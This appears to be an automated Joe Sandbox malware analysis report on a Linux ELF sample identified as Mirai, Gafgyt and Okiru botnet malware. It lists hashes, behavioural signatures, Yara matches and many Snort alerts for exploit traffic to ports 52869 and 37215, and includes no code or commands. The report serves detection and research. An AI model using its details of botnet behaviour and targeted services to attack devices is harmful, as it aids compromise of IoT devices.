Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
faBNhIKHq4.elf

Overview

General Information

Sample name:faBNhIKHq4.elf
renamed because original name is a hash value
Original sample name:62d53c7ec4c2752331182c31d8176b47.elf
Analysis ID:1477275
MD5:62d53c7ec4c2752331182c31d8176b47
SHA1:312d29a7d5949df5fa005a40e7bca89c59cb0f2c
SHA256:f36cf9f570a3d59a4bc0942b1e6cfde4faf83586ca5b9ba20c0b1f0d91c4868d
Tags:32armelfgafgyt
Infos:

Detection

Mirai, Gafgyt, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Gafgyt
Yara detected Mirai
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1477275
Start date and time:2024-07-20 23:00:11 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 34s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:faBNhIKHq4.elf
renamed because original name is a hash value
Original Sample Name:62d53c7ec4c2752331182c31d8176b47.elf
Detection:MAL
Classification:mal100.troj.linELF@0/4@1/0
  • Connection to analysis system has been lost, crash info: Unknown
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/faBNhIKHq4.elf
PID:6220
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
SourceRuleDescriptionAuthorStrings
faBNhIKHq4.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    faBNhIKHq4.elfJoeSecurity_OkiruYara detected OkiruJoe Security
      faBNhIKHq4.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        faBNhIKHq4.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
          faBNhIKHq4.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
              6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
                6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                  6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
                    6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                      Click to see the 6 entries
                      Timestamp:07/20/24-23:01:41.463722
                      SID:2027339
                      Source Port:46604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.955966
                      SID:2027339
                      Source Port:55862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.930422
                      SID:2027339
                      Source Port:55040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.076593
                      SID:2835222
                      Source Port:45364
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.282996
                      SID:2025132
                      Source Port:57500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.122550
                      SID:2831300
                      Source Port:47904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2829579
                      Source Port:53600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132511
                      SID:2829579
                      Source Port:40818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.659435
                      SID:2027339
                      Source Port:52838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.422228
                      SID:2027339
                      Source Port:57522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.318733
                      SID:2025132
                      Source Port:55298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.965786
                      SID:2831300
                      Source Port:58068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.944606
                      SID:2025132
                      Source Port:38246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.724151
                      SID:2027339
                      Source Port:41746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.432263
                      SID:2831300
                      Source Port:53548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.808678
                      SID:2027339
                      Source Port:51954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.054387
                      SID:2835222
                      Source Port:51388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.549328
                      SID:2027339
                      Source Port:52160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.724267
                      SID:2027339
                      Source Port:42848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.928503
                      SID:2027339
                      Source Port:59858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.601575
                      SID:2027339
                      Source Port:57282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222523
                      SID:2829579
                      Source Port:49446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.555689
                      SID:2027339
                      Source Port:35016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.114673
                      SID:2829579
                      Source Port:35562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2835222
                      Source Port:50482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.126052
                      SID:2835222
                      Source Port:38742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.914230
                      SID:2025132
                      Source Port:52386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.439689
                      SID:2831300
                      Source Port:35164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2829579
                      Source Port:56940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:05.126622
                      SID:2025132
                      Source Port:42544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.559170
                      SID:2831300
                      Source Port:45648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.658221
                      SID:2835222
                      Source Port:58944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.720668
                      SID:2027339
                      Source Port:45442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.380126
                      SID:2025132
                      Source Port:47888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.912337
                      SID:2027339
                      Source Port:42548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.150638
                      SID:2835222
                      Source Port:55948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.317668
                      SID:2831300
                      Source Port:35010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.611556
                      SID:2025132
                      Source Port:47134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.405053
                      SID:2027339
                      Source Port:33808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.119631
                      SID:2835222
                      Source Port:47984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.751824
                      SID:2025132
                      Source Port:37240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.343511
                      SID:2027339
                      Source Port:52950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.668312
                      SID:2027339
                      Source Port:45842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.338159
                      SID:2831300
                      Source Port:55568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.187124
                      SID:2025132
                      Source Port:36010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.895849
                      SID:2831300
                      Source Port:51438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.546535
                      SID:2025132
                      Source Port:45056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.389908
                      SID:2027339
                      Source Port:58454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.588009
                      SID:2831300
                      Source Port:43106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.045685
                      SID:2829579
                      Source Port:33838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.820979
                      SID:2829579
                      Source Port:49194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.286911
                      SID:2025132
                      Source Port:56910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2829579
                      Source Port:37104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.380019
                      SID:2027339
                      Source Port:52180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.595072
                      SID:2027339
                      Source Port:57374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.345953
                      SID:2025132
                      Source Port:45422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.966822
                      SID:2025132
                      Source Port:41232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.002144
                      SID:2025132
                      Source Port:41796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.175701
                      SID:2025132
                      Source Port:38730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.354322
                      SID:2027339
                      Source Port:35380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.660100
                      SID:2835222
                      Source Port:40954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.456456
                      SID:2027339
                      Source Port:51624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.082385
                      SID:2835222
                      Source Port:57988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.883171
                      SID:2829579
                      Source Port:33146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2829579
                      Source Port:46330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2835222
                      Source Port:60742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.244899
                      SID:2835222
                      Source Port:45032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.428503
                      SID:2025132
                      Source Port:33086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.839255
                      SID:2831300
                      Source Port:51086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2829579
                      Source Port:33562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.047601
                      SID:2027339
                      Source Port:42960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.271801
                      SID:2025132
                      Source Port:54610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.349095
                      SID:2027339
                      Source Port:34796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.757513
                      SID:2027339
                      Source Port:35420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.889164
                      SID:2829579
                      Source Port:58690
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.697010
                      SID:2831300
                      Source Port:40076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:05.311710
                      SID:2027339
                      Source Port:46826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.740670
                      SID:2027339
                      Source Port:37902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.139063
                      SID:2027339
                      Source Port:43466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2829579
                      Source Port:57076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.810790
                      SID:2831300
                      Source Port:45350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.992285
                      SID:2027339
                      Source Port:37240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.638418
                      SID:2829579
                      Source Port:38424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.091033
                      SID:2027339
                      Source Port:52910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.124695
                      SID:2829579
                      Source Port:42546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.818739
                      SID:2027339
                      Source Port:44594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.621030
                      SID:2027339
                      Source Port:40042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2835222
                      Source Port:60160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.593640
                      SID:2831300
                      Source Port:50794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.148866
                      SID:2027339
                      Source Port:41282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2835222
                      Source Port:55620
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.331813
                      SID:2027339
                      Source Port:35310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.257796
                      SID:2027339
                      Source Port:41528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.519460
                      SID:2831300
                      Source Port:36476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.888802
                      SID:2831300
                      Source Port:52984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.885722
                      SID:2025132
                      Source Port:55240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2835222
                      Source Port:54748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.303421
                      SID:2027339
                      Source Port:50492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.580167
                      SID:2027339
                      Source Port:40960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.681802
                      SID:2027339
                      Source Port:49888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334934
                      SID:2829579
                      Source Port:35780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.957274
                      SID:2829579
                      Source Port:40786
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.064240
                      SID:2829579
                      Source Port:44422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.072415
                      SID:2027339
                      Source Port:49980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.976222
                      SID:2027339
                      Source Port:49862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.175900
                      SID:2829579
                      Source Port:33096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639011
                      SID:2835222
                      Source Port:50384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222229
                      SID:2835222
                      Source Port:54738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.692028
                      SID:2027339
                      Source Port:57984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.053605
                      SID:2829579
                      Source Port:38846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.651912
                      SID:2831300
                      Source Port:33732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:10.633889
                      SID:2025132
                      Source Port:54264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.290003
                      SID:2829579
                      Source Port:44010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.544188
                      SID:2027339
                      Source Port:33672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.215254
                      SID:2025132
                      Source Port:42804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.165469
                      SID:2025132
                      Source Port:58744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.395253
                      SID:2027339
                      Source Port:56002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220999
                      SID:2835222
                      Source Port:41094
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2829579
                      Source Port:52906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.597662
                      SID:2831300
                      Source Port:55010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.729822
                      SID:2829579
                      Source Port:47494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.861410
                      SID:2025132
                      Source Port:55224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.407113
                      SID:2027339
                      Source Port:39946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.320679
                      SID:2027339
                      Source Port:60890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2835222
                      Source Port:36886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.841232
                      SID:2025132
                      Source Port:57342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.974742
                      SID:2831300
                      Source Port:54378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.661049
                      SID:2027339
                      Source Port:58624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2835222
                      Source Port:47098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.862542
                      SID:2025132
                      Source Port:44990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.996260
                      SID:2027339
                      Source Port:58652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.990165
                      SID:2835222
                      Source Port:44634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.987185
                      SID:2831300
                      Source Port:34106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.503242
                      SID:2025132
                      Source Port:54978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.910426
                      SID:2835222
                      Source Port:45686
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.660608
                      SID:2027339
                      Source Port:35026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2829579
                      Source Port:38518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.718842
                      SID:2025132
                      Source Port:37182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.065822
                      SID:2025132
                      Source Port:49282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.635828
                      SID:2835222
                      Source Port:42574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.540053
                      SID:2831300
                      Source Port:59742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2835222
                      Source Port:42542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2835222
                      Source Port:54390
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.571946
                      SID:2027339
                      Source Port:43646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334934
                      SID:2835222
                      Source Port:57662
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.275988
                      SID:2027339
                      Source Port:39732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2835222
                      Source Port:43212
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633744
                      SID:2835222
                      Source Port:37642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.311906
                      SID:2831300
                      Source Port:58730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.855307
                      SID:2025132
                      Source Port:36176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:35.459810
                      SID:2025132
                      Source Port:34686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.984532
                      SID:2027339
                      Source Port:57404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.934101
                      SID:2027339
                      Source Port:42244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.030102
                      SID:2025132
                      Source Port:36116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:21.324806
                      SID:2027339
                      Source Port:46214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
